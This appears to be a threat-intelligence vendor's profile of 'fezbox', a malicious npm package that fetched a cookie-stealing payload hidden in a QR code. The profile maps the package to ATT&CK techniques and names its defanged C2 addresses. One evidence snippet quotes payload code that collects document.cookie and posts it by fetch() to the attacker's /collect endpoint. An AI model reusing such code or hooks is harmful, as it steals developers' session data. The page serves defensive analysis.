Malware

Fezbox

fezbox is a malicious npm package first observed on August 21, 2025. It used an unusual QR code steganography technique to deliver a base64-encoded JavaScript payload tagged "[FEZBOX]". The package was designed to steal browser cookies and related browser context, including document.cookie, window.location.origin, navigator.userAgent, and reported usernames and passwords from browser web cookies. The malware introduced a 120-second execution delay and performed environment checks before continuing, likely as sandbox evasion. It then retrieved a QR code image from the primary command-and-control server at 1[.]94[.]210[.]59, decoded the embedded payload, and exfiltrated collected data via HTTP POST requests to the /collect endpoint. A secondary exfiltration endpoint was also identified at my-nest-app-production[.]up[.]railway[.]app/users. The primary infrastructure was hosted on a Huawei Cloud ECS instance in Beijing, with exposed services on ports 80, 8080, and 9090, including dashboards labeled "C2 Monitor Panel - Educational Use" and "DARKNET C2 CONTROL PANEL." The package was published under the npm alias janedu using the email janedu0216@gmail.com. npm seized the package on September 22, 2025, suspended the janedu account, and replaced the malicious versions 1.0.0 through 1.3.0 with a 0.0.1-security holding package. The package remained live for 32 days and reached up to 476 downloads. As of April 3, 2026, the C2 server remained online. Investigation of an exposed exfiltration database at 1[.]94[.]210[.]59/data found five records, three of which were attributed to the operator’s own test runs; the available content states there were no confirmed victim records, likely because the payload relied on browser APIs that are not normally present in Node.js environments.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques

T1195Supply Chain CompromiseEvidence1

On August 21, 2025, a package called fezbox appeared on npm... The chain: Developer installs fezbox (dependency confusion or direct install)

T1195.001Compromise Software Dependencies and Development ToolsEvidence1

Malicious npm package fezbox (versions 1.0.0 through 1.3.0) was a real supply chain attack... Executes on npm install (postinstall hook)... Sends JSON POST to hxxp://1[.]94[.]210[.]59:8080/collect

Execution

1 technique

T1059.007JavaScriptEvidence1

QR code payload encodes Base64 JavaScript that steals browser cookies and sends them to hxxp://1[.]94[.]210[.]59:8080/collect

Stealth

3 techniques

T1027.003SteganographyEvidence1

FEZBOX used QR code steganography -- an unusual choice for npm supply chain attacks... Fetches a QR code image from 1[.]94[.]210[.]59 Decodes the QR content: a base64-encoded JavaScript payload tagged [FEZBOX]

T1497Virtualization/Sandbox EvasionEvidence1

Package loads and waits 120 seconds (sandbox evasion) Checks environment to ensure it's running in a real development context

T1497.001System ChecksEvidence1

Checks environment to ensure it's running in a real development context

Credential Access

1 technique

T1539Steal Web Session CookieEvidence1

The JS payload steals document.cookie , window.location.origin , and navigator.userAgent

Discovery

6 techniques

T1016System Network Configuration DiscoveryEvidence1

Collects comprehensive system fingerprint... Network: all interface names, primary IP

T1033System Owner/User DiscoveryEvidence1

MITRE ATT&CK Mapping... Discovery System Owner/User Discovery T1033 USER, HOME environment variables

T1057Process DiscoveryEvidence1

MITRE ATT&CK Mapping... Discovery Process Discovery T1057 PID, CWD, execPath collection

T1082System Information DiscoveryEvidence2

The data includes: Hostname : hstx Username : asus CPU : 13th Gen Intel Core i7-13700H (20 cores) RAM : 16 GB OS : Windows 11... Node.js : v20.18.0 IP address : 183[.]210[.]123[.]88 Network interfaces...

T1497Virtualization/Sandbox EvasionEvidence1

Package loads and waits 120 seconds (sandbox evasion) Checks environment to ensure it's running in a real development context

T1497.001System ChecksEvidence1

Checks environment to ensure it's running in a real development context

Collection

1 technique

T1005Data from Local SystemEvidence1

The QR code encodes a Base64 JavaScript payload... const data = { cookies : document.cookie , origin : window.location.origin , userAgent : navigator.userAgent ... }; fetch('hxxp://1[.]94[.]210[.]59:8080/collect' ... )

Command and Control

1 technique

T1071.001Web ProtocolsEvidence2

Exfiltrates via HTTP POST to /collect on the C2

Exfiltration

1 technique

T1041Exfiltration Over C2 ChannelEvidence2

POST to C2: hxxp://1[.]94[.]210[.]59:8080/collect... LIVE exfiltration receiver -- accepts any JSON

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

3 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

2 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

3 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

hash.sha256●●●●●●●●●●●●View more in app3 months ago

uri●●●●●●●●●●●●View more in app3 months ago

hash.sha256●●●●●●●●●●●●View more in app3 months ago

ip.v4●●●●●●●●●●●●View more in app3 months ago

uri●●●●●●●●●●●●View more in app3 months ago

ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app

breakglass intelNews

Apr 3, 2026

32 Days on npm, Zero Victims, and a Developer Who Tested Malware on His Own Laptop: The FEZBOX Supply Chain Post-Mortem - Breakglass Intelligence - Breakglass Intelligence

Malicious npm package that used QR code steganography to retrieve a base64-encoded JavaScript payload, then attempted to steal browser cookies, origin, and user-agent data and exfiltrate them to attacker-controlled C2 infrastructure. It also performed environment checks and delayed execution for sandbox evasion.

sysdig blogNews

Oct 6, 2025

Sysdig Security Briefing: October 2025

A malicious NPM package designed to steal usernames and passwords from browser web cookies and embed malicious code into a QR code.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching8

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping14

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.